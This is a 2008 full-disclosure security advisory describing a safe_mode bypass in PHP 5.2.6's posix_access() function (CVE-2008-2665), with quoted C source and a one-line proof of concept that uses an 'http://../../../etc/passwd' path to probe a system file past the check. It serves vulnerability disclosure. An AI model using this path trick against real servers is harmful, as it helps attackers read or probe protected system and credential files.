-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [PHP 5.2.6 posix_access() (posix ext) safe_mode bypass ] Author: Maksymilian Arciemowicz (cXIb8O3) SecurityReason.com Date: - - Written: 10.05.2008 - - Public: 17.06.2008 SecurityReason Research SecurityAlert Id: 54 CVE: CVE-2008-2665 CWE: CWE-264 SecurityRisk: Low Affected Software: PHP 5.2.6 Advisory URL: http://securityreason.com/achievement_securityalert/54 Vendor: http://www.php.net - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. posix_access ? Determine accessibility of a file SYNOPSIS: bool posix_access ( string $file [, int $mode ] ) http://pl2.php.net/manual/pl/function.posix-access.php !!! WARNING !!! IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL NOT LIST ALL VULNERABLE FUNCTIONS - --- 1. PHP 5.2.6 posix_access() safe_mode bypass --- Let's see to posix_access() function - --- PHP_FUNCTION(posix_access) { long mode = 0; int filename_len, ret; char *filename, *path; if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|l", &filename, &filename_len, &mode) == FAILURE) { RETURN_FALSE; } path = expand_filepath(filename, NULL TSRMLS_CC); if (!path) { POSIX_G(last_error) = EIO; RETURN_FALSE; } if (php_check_open_basedir_ex(path, 0 TSRMLS_CC) || (PG(safe_mode) && (!php_checkuid_ex(filename, NULL, CHECKUID_CHECK_FILE_AND_DIR, CHECKUID_NO_ERRORS)))) { efree(path); POSIX_G(last_error) = EPERM; RETURN_FALSE; } ret = access(path, mode); efree(path); if (ret) { POSIX_G(last_error) = errno; RETURN_FALSE; } RETURN_TRUE; } - --- var_dump(posix_access("http://../../../etc/passwd"))==True var_dump(posix_access("/etc/passwd"))==False Why? Because path = expand_filepath(filename, NULL TSRMLS_CC); will change "http://../../../etc/passwd" to path=/etc/passwd (PG(safe_mode) && (!php_checkuid_ex(filename, NULL, CHECKUID_CHECK_FILE_AND_DIR, CHECKUID_NO_ERRORS))) will check realy path "http://../../../etc/passwd". http:// is using in php_checkuid_ex(), so safe_mode is bypassed. !!! WARNING !!! IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL NOT LIST ALL VULNERABLE FUNCTIONS - --- 2. How to Fix --- Do not use safe_mode as a main safety - --- 3. Greets --- sp3x Infospec schain p_e_a Chujwamwdupe - --- 4. Contact --- Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ] Email: cxib [at] securityreason [dot] com GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg http://securityreason.com http://securityreason.pl -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.4 (FreeBSD) iD8DBQFIWCC+W1OhNJH6DMURAsq4AJ0eC1qKOZVOJJB3XDRIhpufNe1qUwCfTWv0 n4Sg31DePRpr4h3PLouKFoA= =6qwD -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/